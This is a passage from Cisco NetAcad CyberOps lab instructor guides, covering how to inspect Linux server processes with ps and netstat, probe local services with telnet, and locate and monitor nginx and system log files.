210 210 210 ? 00:01:41 java
212 212 212 ? 00:00:01 ovsdb-server
213 213 213 ? 00:00:00 start_pox.sh
224 213 213 ? 00:01:18 python2.7
214 214 214 ? 00:00:00 systemd-logind
216 216 216 ? 00:00:01 dbus-daemon
221 221 221 ? 00:00:05 filebeat
239 239 239 ? 00:00:05 VBoxService
287 287 287 ? 00:00:00 ovs-vswitchd
382 382 382 ? 00:00:00 dhcpcd
387 387 387 ? 00:00:00 lightdm

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 2 of 7 www.netacad.com
Lab – Linux Servers

410 410 410 tty7 00:00:10 Xorg

460 387 387 ? 00:00:00 lightdm
492 492 492 ? 00:00:00 sh
503 492 492 ? 00:00:00 xfce4-session
513 492 492 ? 00:00:00 xfwm4
517 492 492 ? 00:00:00 Thunar
1592 492 492 ? 00:00:00 thunar-volman
519 492 492 ? 00:00:00 xfce4-panel
554 492 492 ? 00:00:00 panel-6-systray
559 492 492 ? 00:00:00 panel-2-actions
523 492 492 ? 00:00:01 xfdesktop
530 492 492 ? 00:00:00 polkit-gnome-au
395 395 395 ? 00:00:00 nginx
396 395 395 ? 00:00:00 nginx
408 384 384 ? 00:01:58 java
414 414 414 ? 00:00:00 accounts-daemon
418 418 418 ? 00:00:00 polkitd
<some output omitted>
How is the process hierarchy represented by ps?
____________________________________________________________________________________
Through indentation.
c. As mentioned before, servers are essentially programs, often started by the system itself at boot time.
The task performed by a server is called service. In such fashion, a web server provides web services.
The netstat command is a great tool to help identify the network servers running on a computer. The
power of netstat lies on its ability to display network connections.
Note: Your output maybe different depending on the number of open network connections on your VM.
In the terminal window, type netstat.
[analyst@secOps ~]$ netstat
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost.localdo:48746 localhost.local:wap-wsp ESTABLISHED
tcp 0 0 localhost.localdo:48748 localhost.local:wap-wsp ESTABLISHED
tcp6 0 0 localhost.local:wap-wsp localhost.localdo:48748 ESTABLISHED
tcp6 0 0 localhost.local:wap-wsp localhost.localdo:48746 ESTABLISHED
tcp6 0 0 localhost.local:wap-wsp localhost.localdo:48744 ESTABLISHED
tcp6 0 0 localhost.localdo:48744 localhost.local:wap-wsp ESTABLISHED
Active UNIX domain sockets (w/o servers)
Proto RefCnt Flags Type State I-Node Path
unix 3 [ ] DGRAM 8472 /run/systemd/notify
unix 2 [ ] DGRAM 8474 /run/systemd/cgroups-
agent<some output omitted>
As seen above, netstat returns lots of information when used without options. Many options can be used
to filter and format the output of netstat, making it more useful.
d. Use netstat with the –tunap options to adjust the output of netstat. Notice that netstat allows multiple
options to be grouped together under the same “-“ sign.
The information for the nginx server is highlighted.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 3 of 7 www.netacad.com
Lab – Linux Servers

[analyst@secOps ~]$ sudo netstat -tunap

[sudo] password for analyst:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
395/nginx: master p
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
279/vsftpd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
277/sshd
tcp 0 0 0.0.0.0:6633 0.0.0.0:* LISTEN
257/python2.7
tcp6 0 0 :::22 :::* LISTEN
277/sshd
tcp6 0 0 :::23 :::* LISTEN
1/init
udp 0 0 192.168.1.15:68 0.0.0.0:*
237/systemd-network
What is the meaning of the –t, -u, –n, –a and –p options in netstat? (use man netstat to answer)
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
-a: shows both listen and non-listening sockets. -n: use numeric output (no DNS, service port or
username resolution), -p: show the PID of the connection owner process. -t: shows TCP connections. –u:
shows UDP connections
Is the order of the options important to netstat?
____________________________________________________________________________________
No, the option order is irrelevant.
Clients will connect to a port and, using the correct protocol, request information from a server. The
netstat output above displays a number of services that are currently listening on specific ports.
Interesting columns are:
- The first column shows the Layer 4 protocol in use (UDP or TCP, in this case).
- The third column uses the <ADDRESS:PORT> format to display the local IP address and port on
which a specific server is reachable. The IP address 0.0.0.0 signifies that the server is currently
listening on all IP addresses configured in the computer.
- The fourth column uses the same socket format <ADDRESS:PORT> to display the address and port
of the device on the remote end of the connection. 0.0.0.0:* means that no remote device is currently
utilizing the connection.
- The fifth column displays the state of the connection.
- The sixth column displays the process ID (PID) of the process responsible for the connection. It also
displays a short name associated to the process.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 4 of 7 www.netacad.com
Lab – Linux Servers

Based on the netstat output shown in item (d), what is the Layer 4 protocol, connection status, and PID
of the process running on port 80?
____________________________________________________________________________________
TCP, LISTEN and 395.
While port numbers are just a convention, can you guess what kind of service is running on port 80 TCP?
____________________________________________________________________________________
This is probably a web server.
e. Sometimes it is useful to cross the information provided by netstat with ps. Based on the output of item
(d), it is known that a process with PID 395 is bound to TCP port 80. Port 395 is used in this example.
Use ps and grep to list all lines of the ps output that contain PID 395:
[analyst@secOps ~]$ sudo ps -elf | grep 395
[sudo] password for analyst:
1 S root 395 1 0 80 0 - 1829 sigsus Feb27 ? 00:00:00 nginx:
master process /usr/bin/nginx -g pid /run/nginx.pid; error_log stderr;
5 S http 396 395 0 80 0 - 1866 SyS_ep Feb27 ? 00:00:00 nginx:
worker process
0 S analyst 3789 1872 0 80 0 - 1190 pipe_w 14:05 pts/1 00:00:00 grep 395
In the output above, the ps command is piped through the grep command to filter out only the lines
containing the number 395. The result is three lines with text wrapping.
The first line shows a process owned by the root user (third column), started by another process with PID
1 (fifth column), on Feb27 (twelfth column) with command /usr/bin/nginx -g pid /run/nginx.pid;
error_log stderr;
The second line shows a process with PID 396, owned by the http user, started by process 395, on
Feb27.
The third line shows a process owned by the analyst user, with PID 3789, started by a process with PID
1872, as the grep 395 command.
The process PID 395 is nginx. How could that be concluded from the output above?
____________________________________________________________________________________
Based on the last column of line 1, the output shows nginx command line.
What is nginx? What is its function? (Use google to learn about nginx)
____________________________________________________________________________________
nginx is a lightweight webserver. A quick google search is extremely helpful on finding information about
unidentified processes.
The second line shows that process 396 is owned by a user named http and has process number 395 as
its parent process. What does that mean? Is this common behavior?
____________________________________________________________________________________
It means that nginx started process 396 under the http username. This is normal as nginx runs itself for
every client that connects to port 80 TCP.
Why is the last line showing grep 395?
____________________________________________________________________________________
Because the grep 395 was used to filter the ps output, when the output was compiled, grep 395 was still
running and therefore, it appeared in the list.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 5 of 7 www.netacad.com
Lab – Linux Servers

Part 2: Using Telnet to Test TCP Services

Telnet is a simple remote shell application. Telnet is considered insecure because it does not provide
encryption. Administrators who choose to use Telnet to remotely manage network devices and servers will
expose login credentials to that server, as Telnet will transmit session data in clear text. While Telnet is not
recommended as a remote shell application, it can be very useful for quickly testing or gathering information
about TCP services.
The Telnet protocol operates on port 23 using TCP by default. The telnet client however, allows for a different
port to be specified. By changing the port and connecting to a server, the telnet client allows for a network
analyst to quickly assess the nature of a specific server by communicating directly to it.
Note: It is strongly recommended that ssh be used as remote shell application instead of telnet.
a. In Part 1, nginx was found to be running and assigned to port 8080 TCP. Although a quick Google search
revealed that nginx is a lightweight web server, how would an analyst be sure of that? What if an attacker
changed the name of a malware program to nginx, just to make it look like the popular webserver? Use
telnet to connect to the local host on port 8080 TCP:
[analyst@secOps ~]$ telnet 127.0.0.1 8080
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
b. Press a few letters on the keyboard. Any key will work. After a few keys are pressed, press ENTER.
Below is the full output, including the Telnet connection establishment and the random keys pressed
(fdsafsdaf, this case):
fdsafsdaf
HTTP/1.1 400 Bad Request
Server: nginx/1.10.2
Date: Tue, 28 Feb 2017 20:09:37 GMT
Content-Type: text/html
Content-Length: 173
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.10.2</center>
</body>
</html>
Connection closed by foreign host.
Thanks to the Telnet protocol, a clear text TCP connection was established, by the Telnet client, directly
to the nginx server, listening on 127.0.0.1 port 80 TCP. This connection allows us to send data directly to
the server. Because nginx is a web server, it does not understand the sequence of random letters sent to
it and returns an error in the format of a web page.
Why was the error sent as a web page?
____________________________________________________________________________________
Nginx is a web server and as such, only speaks the HTTP protocol.
While the server reported an error and terminated the connection, we were able to learn a lot. We learned
that:

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 6 of 7 www.netacad.com
Lab – Linux Servers

1) The nginx with PID 395 is in fact a web server.

2) The version of nginx is 1.10.2.
3) The network stack of our CyberOps Workstation VM is fully functional all the way to Layer 7.
Not all services are equal. Some services are designed to accept unformatted data and will not terminate
if garbage is entered via keyboard. Below is an example of such a service:
c. Looking at the netstat output presented earlier, it is possible to see a process attached to port 22. Use
Telnet to connect to it.
Port 22 TCP is assigned to SSH service. SSH allows an administrator to connect to a remote computer
securely.
Below is the output:
[analyst@secOps ~]$ telnet 127.0.0.1 22
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.4
sdfjlskj
Protocol mismatch.
Connection closed by foreign host.
Use Telnet to connect to port 68. What happens? Explain.
____________________________________________________________________________________
Referring back to the netstat output, it is possible to see that port 68 is in fact a UDP port. telnet is a
TCP-based protocol and will not be able to connect to UDP ports.

Reflection
What are the advantages of using netstat?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Netstat allows for an analyst to display all the connections currently present on a computer. Source and
destination addresses, ports, and process IDs can also be displayed, providing a quick overview of all
connections present on a computer.
What are the advantages of using Telnet? Is it safe?
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
_______________________________________________________________________________________
Yes, as long it is not used as a remote shell. It is perfectly safe to quickly test or gather information about a
given network service.

 Cisco and/or its affiliates. All rights reserved. Cisco Confidential Page 7 of 7 www.netacad.com
Lab – Locating Log Files (Instructor Version)
Instructor Note: Red font color or gray highlights indicate text that appears in the instructor copy only.

Introduction
In this lab, you will get familiar with locating and manipulating Linux log files.

Required Resources
 CyberOps Workstation Virtual Machine

Part 1: Log File Overview

Log files (also spelled logfiles), are files used by computers to log events. Software programs, background
processes, services, or transactions between services, including the operating system itself, may generate
such events. Log files are dependent on the application that generates them. It is up to the application
developer to conform to log file convention. Software documentation should include information on its log
files.

Step 1: Web server log file example

Because log files are essentially a way to track specific events, the type of information stored varies
depending of the application or services generating the events.
a. Consider the single log entry below. It was generated by Apache, a popular web server.
[Wed Mar 22 11:23:12.207022 2017] [core:error] [pid 3548:tid 4682351596] [client
209.165.200.230] File does not exist: /var/www/apache/htdocs/favicon.ico
The single log entry above represents a web event recorder by Apache. A few pieces of information are
important in web transactions, including client IP address, time and details of the transaction. The entry
above can be broken down into five main parts:
Timestamp: This part records when the event took place. It is very important that the server clock is
correctly synchronized as it allows for accurately cross-referencing and tracing back events.
Type: This is the type of event. In this case, it was an error.
PID: This contains information about the process ID used by Apache at the moment.
Client: This records the IP address of the requesting client.
Description: This contains a description of the event.
Based on the log entry above, describe what happened.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
On Wednesday, March 22nd, 11:23:12.207022 am of 2017, a client with IP address of 209.165.200.230
requested a non-existent file named favicon.ico. The file should have been located in the following path
/var/www/apache/htdocs/favicon.ico, but because it could not be found, it triggered an error.
Use the cat command below to list a web server sample log file. The sample file is located at /var/log:
[analyst@secOps ~]$ cat /var/log/logstash-tutorial.log

83.149.9.216 - - [04/Jan/2015:05:13:42 +0000] "GET /presentations/logstash-monitorama-

2013/images/kibana-search.png HTTP/1.1" 200 203023
"http://semicomplete.com/presentations/logstash-monitorama-2013/" "Mozilla/5.0
(Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/32.0.1700.77 Safari/537.36"
83.149.9.216 - - [04/Jan/2015:05:13:42 +0000] "GET /presentations/logstash-monitorama-
2013/images/kibana-dashboard3.png HTTP/1.1" 200 171717
"http://semicomplete.com/presentations/logstash-monitorama-2013/" "Mozilla/5.0
(Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/32.0.1700.77 Safari/537.36"
83.149.9.216 - - [04/Jan/2015:05:13:44 +0000] "GET /presentations/logstash-monitorama-
2013/plugin/highlight/highlight.js HTTP/1.1" 200 26185
"http://semicomplete.com/presentations/logstash-monitorama-2013/" "Mozilla/5.0
(Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/32.0.1700.77 Safari/537.36”
<some output omitted>
Is the output above still considered a web transaction? Explain why the output of the cat command is in a
different format than the single entry shown in item (a).
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
Yes, it is a web event. The fields are in a different order, but the GET message, the presence of client IP
addresses, references to various web browsers and the HTTPv1.1, confirms this is a web server log file.
The format is different because the service was configured to record different fields in a different order.

Step 2: Operating system log file example

Any software can keep log files, including the operating system itself. Conventionally, Linux uses the /var/log
directory to stores various log files, including operating system logs. Modern operating systems are complex
pieces of software and therefore, use several different files to log events. This section takes a quick look at
the /var/log/messages file.
a. Stored under /var/log, the messages file stores various system events. The connection of new USB drive,
a network card becoming available, and too many missed root login attempts, are a few examples of
events logged to the /var/log/messages file. Use the more command to display the contents of the
/var/log/messages file. Unlike the cat command, more allows for a paced navigation through the file.
Press ENTER to advance line-by-line or SPACE to advance an entire page. Press q or CTRL + C to
abort and exit more.
Note: the sudo command is required because the messages file belongs to the root user.
[analyst@secOps ~]$ sudo more /var/log/messages
[sudo] password for analyst:
Mar 20 08:34:38 secOps kernel: [6.149910] random: crng init done
Mar 20 08:34:40 secOps kernel: [8.280667] floppy0: no floppy controllers found
Mar 20 08:34:40 secOps kernel: [8.280724] work still pending
Mar 20 08:35:16 secOps kernel: [ 44.414695] hrtimer: interrupt took 5346452 ns
Mar 20 14:28:29 secOps kernel: [21239.566409] pcnet32 0000:00:03.0 enp0s3: link down
Mar 20 14:28:33 secOps kernel: [21243.404646] pcnet32 0000:00:03.0 enp0s3: link up,
100Mbps, full-duplex
Mar 20 14:28:35 secOps kernel: [21245.536961] pcnet32 0000:00:03.0 enp0s3: link down
Mar 20 14:28:43 secOps kernel: [21253.427459] pcnet32 0000:00:03.0 enp0s3: link up,
100Mbps, full-duplex

Mar 20 14:28:53 secOps kernel: [21263.449480] pcnet32 0000:00:03.0 enp0s3: link down
Mar 20 14:28:57 secOps kernel: [21267.500152] pcnet32 0000:00:03.0 enp0s3: link up,
100Mbps, full-duplex
Mar 20 14:29:01 secOps kernel: [21271.551499] pcnet32 0000:00:03.0 enp0s3: link down
Mar 20 14:29:05 secOps kernel: [21275.389707] pcnet32 0000:00:03.0 enp0s3: link up,
100Mbps, full-duplex
Mar 22 06:01:40 secOps kernel: [0.000000] Linux version 4.8.12-2-ARCH
(builduser@andyrtr) (gcc version 6.2.1 20160830 (GCC) ) #1 SMP PREEMPT Fri Dec 2
20:41:47 CET 2016
Mar 22 06:01:40 secOps kernel: [0.000000] x86/fpu: Supporting XSAVE feature 0x001:
'x87 floating point registers'
Mar 22 06:01:40 secOps kernel: [0.000000] x86/fpu: Supporting XSAVE feature 0x002:
'SSE registers'
Mar 22 06:01:40 secOps kernel: [0.000000] x86/fpu: Supporting XSAVE feature 0x004:
'AVX registers'
Mar 22 06:01:40 secOps kernel: [0.000000] x86/fpu: xstate_offset[2]: 576,
xstate_sizes[2]: 256
Mar 22 06:01:40 secOps kernel: [0.000000] x86/fpu: Enabled xstate features 0x7,
context size is 832 bytes, using 'standard' format.
Mar 22 06:01:40 secOps kernel: [0.000000] x86/fpu: Using 'eager' FPU context switches.
<some output omitted>
Notice that the events listed above are very different from the web server events. Because the operating
system itself is generating this log, all recorded events are in relation to the OS itself.
b. If necessary, enter Ctrl + C to exit out of the previous command.
c. Log files are very important for troubleshooting. Assume that a user of that specific system reported that
all network operations were slow around 2:30pm. Can you find evidence of that in the log entries shown
above? If so in what lines? Explain.
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
____________________________________________________________________________________
On Wednesday, March 20nd, 14:28:33 through 14:29:05 (lines 5 – 12) the network card was flapping
(switching from up to down quickly). The log entries clearly confirm the user report.

Part 2: Locating Log Files in Unknown Systems

The CyberOps Workstation VM includes nginx, a lightweight web server. This section will show how to
find and display nginx logs using the CyberOps Workstation VM.
Note: nginx was installed on the CyberOps Workstation VM with its default settings. With default settings,
its global configuration file is located under /etc/nginx/nginx.conf, its access log file is at
/var/log/nginx/access.log, and errors are redirected to the terminal window. However, it is common for a
security analyst to work on computers in which the installation details for tool and services are unknown.
This section describes the process of locating such files described for nginx but is by no means complete.
Nevertheless, it should be a good exercise about locating and displaying log files on unfamiliar systems.
a. When working with new software, the first step is to look at the documentation. It provides important
information about the software, including information about its log files. Use the man command to display
the nginx manual page:
[analyst@secOps ~]$ man nginx

NGINX(8) BSD System Manager's Manual

NGINX(8)

NAME
nginx — HTTP and reverse proxy server, mail proxy server

SYNOPSIS
nginx [-?hqTtVv] [-c file] [-g directives] [-p prefix] [-s signal]

DESCRIPTION
nginx (pronounced “engine x”) is an HTTP and reverse proxy server, as well as a
mail proxy
server. It is known for its high performance, stability, rich feature set,
simple configura‐
tion, and low resource consumption.
<some output omitted>
b. Scroll down the page to locate the nginx logging section. The documentation makes it clear that nginx
supports logging, with the location of its log files defined at compilation time.
[PARTIAL OUTPUT EXTRACTED FROM NGINX MANUAL PAGE]

DEBUGGING LOG
To enable a debugging log, reconfigure nginx to build with debugging:

./configure --with-debug ...

and then set the debug level of the error_log:

error_log /path/to/log debug;

It is also possible to enable the debugging for a particular IP address:

events {
debug_connection 127.0.0.1;
}
c. The manual page also contains information on the files used by nginx. Scroll down further to display the
nginx operating files under the Files section:
FILES
%%PID_PATH%%
Contains the process ID of nginx. The contents of this file are
not sensitive, so it can be world-readable.

%%CONF_PATH%%
The main configuration file.

%%ERROR_LOG_PATH%%
Error log file.

The outputs above help you to conclude that nginx supports logging and that it can save to log files. The
output also hints at the existence of a configuration file for nginx.
d. Before looking for nginx files, use the ps and the grep commands to ensure nginx is running in the VM.
Note: Use man to learn more about ps and grep commands.
[analyst@secOps ~]$ ps ax | grep nginx
415 ? Ss 0:00 nginx: master process /usr/bin/nginx -g pid
/run/nginx.pid; error_log stderr;
416 ? S 0:00 nginx: worker process
1207 pts/0 S+ 0:00 grep nginx
The output above confirms that nginx is running. In addition, the output also displays the parameters used
when nginx was started. nginx process ID is being stored in /run/nginx.pid and error messages are being
redirected to the terminal.
Note: If nginx is not running, enter the sudo /usr/sbin/nginx at the prompt to start the service using the
default configuration.
Note: If you need to restart nginx, you can kill the service by using the sudo pkill nginx command. To
start nginx with the custom configuration from a previous lab, run the following command: sudo nginx -c
custom_server.conf, and test the server by opening a web browser and going to URL: 127.0.0.1:8080. If
you wish to start nginx with a default configuration you can start it with the command: sudo
/usr/sbin/nginx, and open a web browser and go to URL: 127.0.0.1.
Because the location to the log files was not specified, the global nginx configuration file should be
checked for the location of the log files.
e. By design, the CyberOps Workstation VM utilizes default locations and definitions as much as possible.
Conventionally, the /var/log directory holds various log files for various applications and services while
configuration files are stored under the /etc directory. While the nginx manual page did not provide an
exact location for its log files, it not only confirmed that nginx supports logging but also hinted at the
location of a configuration file. Because the log file locations can often be customized in configuration
files, a logical next step is to use the ls command to look under /etc and look for a nginx configuration file:
[analyst@secOps ~]$ ls /etc/
adjtime host.conf mke2fs.conf rc_maps.cfg
apache-ant hostname mkinitcpio.conf request-key.conf
apparmor.d hosts mkinitcpio.d request-key.d
arch-release ifplugd modprobe.d resolv.conf
avahi initcpio modules-load.d resolvconf.conf
bash.bash_logout inputrc motd rpc
bash.bashrc iproute2 mtab rsyslog.conf
binfmt.d iptables nanorc securetty
ca-certificates issue netconfig security
crypttab java-7-openjdk netctl services
dbus-1 java-8-openjdk netsniff-ng shadow
default kernel nginx shadow-
depmod.d krb5.conf nscd.conf shells
dhcpcd.conf ld.so.cache nsswitch.conf skel
dhcpcd.duid ld.so.conf ntp.conf ssh
dkms ld.so.conf.d openldap ssl
drirc libnl openvswitch sudoers
elasticsearch libpaper.d os-release sudoers.d
environment lightdm pacman.conf sudoers.pacnew
ethertypes locale.conf pacman.conf.pacnew sysctl.d

<output omitted>
f. Notice the nginx folder under /etc in the output above. Using ls again, we find a number of files, including
one named nginx.conf.
[analyst@secOps ~]$ ls -l /etc/nginx/
total 48
-rw-r--r-- 1 root root 2730 Mar 21 16:02 custom_server.conf
-rw-r--r-- 1 root root 1077 Nov 18 15:14 fastcgi.conf
-rw-r--r-- 1 root root 1007 Nov 18 15:14 fastcgi_params
-rw-r--r-- 1 root root 2837 Nov 18 15:14 koi-utf
-rw-r--r-- 1 root root 2223 Nov 18 15:14 koi-win
-rw-r--r-- 1 root root 2743 Jan 6 15:41 mal_server.conf
-rw-r--r-- 1 root root 3957 Nov 18 15:14 mime.types
-rw-r--r-- 1 root root 3264 Mar 22 13:34 nginx.conf
-rw-r--r-- 1 root root 3261 Oct 19 16:42 nginx.conf.working
-rw-r--r-- 1 root root 636 Nov 18 15:14 scgi_params
-rw-r--r-- 1 root root 664 Nov 18 15:14 uwsgi_params
-rw-r--r-- 1 root root 3610 Nov 18 15:14 win-utf
g. Use the cat command to list the contents of /etc/nginx/nginx.conf. You can also use more or less to view
the file and nano or SciTE to edit it. These tools make it easier to navigate through long text files (only
the output of cat is displayed below).
[analyst@secOps ~]$ cat /etc/nginx/nginx.conf
#user html;
worker_processes 1;

#error_log logs/error.log;
#error_log logs/error.log notice;
#error_log logs/error.log info;
#pid logs/nginx.pid;

events {
worker_connections 1024;
}

<some output omitted>

Note: Lines that start with ‘#’ are comments and are ignored by nginx.
h. A quick look at the configuration file reveals that it is an nginx configuration file. Because there is no direct
mention to the location of nginx log files, it is very likely that nginx is using default values for it. Following
the convention of storing log files under /var/log, use the ls command to list its contents:
[analyst@secOps ~]$ ls -l /var/log/
total 5708
-rw-r----- 1 root log 188962 Apr 19 10:35 auth.log
-rw-rw---- 1 root utmp 384 Apr 19 10:05 btmp
-rw-rw---- 1 root utmp 1536 Mar 22 08:50 btmp.1
-rw-r----- 1 root log 849038 Apr 19 10:05 daemon.log
-rw-r----- 1 root log 4416 Apr 19 09:45 errors.log
-rw-r----- 1 root log 1819814 Apr 19 10:05 everything.log
-rw------- 1 root root 32032 Apr 19 10:05 faillog

drwxr-sr-x+ 4 root systemd-journal 4096 Mar 20 15:28 journal

-rw-r----- 1 root log 927701 Apr 19 09:45 kernel.log
-rw-rw-r-- 1 root utmp 292292 Mar 26 11:03 lastlog
drwx--x--x 2 root lightdm 4096 Apr 19 09:45 lightdm
-rw-r--r-- 1 analyst analyst 24464 Apr 19 10:05 logstash-tutorial.log
-rw-r----- 1 root log 1673153 Apr 19 10:05 messages
drwxr-xr-x 2 root root 4096 Apr 19 10:28 nginx
-rw-r--r-- 1 http root 989 Apr 19 10:05 nginx-logstash.log
drwxr-xr-x 2 root root 4096 Jan 5 14:17 old
-rw-r--r-- 1 root root 97655 Apr 17 12:52 pacman.log
drwxr-xr-x 2 snort snort 4096 Mar 26 11:03 snort
-rw-r----- 1 root log 563 Apr 19 09:45 syslog.log
-rw------- 1 root root 64064 Mar 26 11:03 tallylog
-rw-r----- 1 root log 216 Apr 17 13:04 user.log
-rw-rw-r-- 1 root utmp 70272 Apr 19 09:45 wtmp
-rw-r--r-- 1 root root 24756 Apr 19 09:45 Xorg.0.log
-rw-r--r-- 1 root root 25585 Apr 17 14:43 Xorg.0.log.old
i. As shown above, the /var/log directory has a subdirectory named nginx. Use the ls command again to
list the contents of /var/log/nginx.
Note: Because the /var/log/nginx belongs to the http user, you must execute ls as root by preceding it
with the sudo command.
[analyst@secOps ~]$ sudo ls -l /var/log/nginx
[sudo] password for analyst:
total 20
-rw-r----- 1 http log 2990 Mar 22 11:20 access.log
-rw-r----- 1 http log 141 Feb 28 15:57 access.log.1.gz
These are very likely to be the log files in use by nginx. Move on to the next section to monitor these files
and get confirmation that they are indeed nginx log files.
Note: Your output may be different. The .GZ log files above were generated by a log rotation service.
Linux systems often implement a service to rotate logs, ensuring that individual log files do not become
too large. The log rotate service takes the latest log file, compresses it and saves it under a different
name (access.log.1.gz, access.log.2.gz, etc). A new empty main log file is then created and used to store
the latest log entries.

Part 3: Monitoring Log files in Real Time

As seen in the previous sections, log files can be displayed with many text-presentation tools. While cat,
more, less, and nano can be used to work with log files, they are not suitable for log file real-time monitoring.
Developers designed various tools that allow for log file real-time monitoring. Some tools are text-based while
others have a graphical interface. This lab focuses on tail, a simple but efficient tool, available in practically
every Unix-based system.

Step 1: Using the tail command

The tail command displays the end of a text file. By default, tail will display the last ten (10) lines of a text file.
a. Use the tail command to display the end of the /var/log/nginx/access.log.
[analyst@secOps ~]$ sudo tail /var/log/nginx/access.log
[sudo] password for analyst:

127.0.0.1 - - [21/May/2017:15:32:32 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0

(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/May/2017:15:32:34 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/May/2017:15:32:41 -0400] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/May/2017:15:32:41 -0400] "GET /favicon.ico HTTP/1.1" 404 169 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/May/2017:15:32:44 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:11:20:27 -0400] "GET /favicon.ico HTTP/1.1" 404 169 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:12:49:26 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:12:49:50 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:12:49:53 -0400] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:13:01:55 -0400] "GET /favicon.ico HTTP/1.1" 404 169 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
[analyst@secOps ~]$
b. Use the –n option to specify how many lines from the end of a file, tail should display.
[analyst@secOps ~]$ sudo tail -n 5 /var/log/nginx/access.log
127.0.0.1 - - [22/May/2017:11:20:27 -0400] "GET /favicon.ico HTTP/1.1" 404
169 "-" "Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:12:49:26 -0400] "GET / HTTP/1.1" 304 0 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:12:49:50 -0400] "GET / HTTP/1.1" 304 0 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:12:49:53 -0400] "GET / HTTP/1.1" 200 612 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/May/2017:13:01:55 -0400] "GET /favicon.ico HTTP/1.1" 404
169 "-" "Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
[analyst@secOps ~]$
c. You can use the tail command with the -f option to monitor the nginx access.log in real-time. Short for
follow, -f tells tail to continuously display the end of a given text file. In a terminal window, issue tail with
the –f option:
[analyst@secOps log]$ sudo tail -f /var/log/nginx/access.log
[sudo] password for analyst:
127.0.0.1 - - [21/Mar/2017:15:32:32 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/Mar/2017:15:32:34 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/Mar/2017:15:32:41 -0400] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/Mar/2017:15:32:41 -0400] "GET /favicon.ico HTTP/1.1" 404 169 "-"
"Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [21/Mar/2017:15:32:44 -0400] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0
(X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0"
127.0.0.1 - - [22/Mar/2017:11:20:27 -0400] "GET /favicon.ico HTTP/1.1" 404 169 "-"
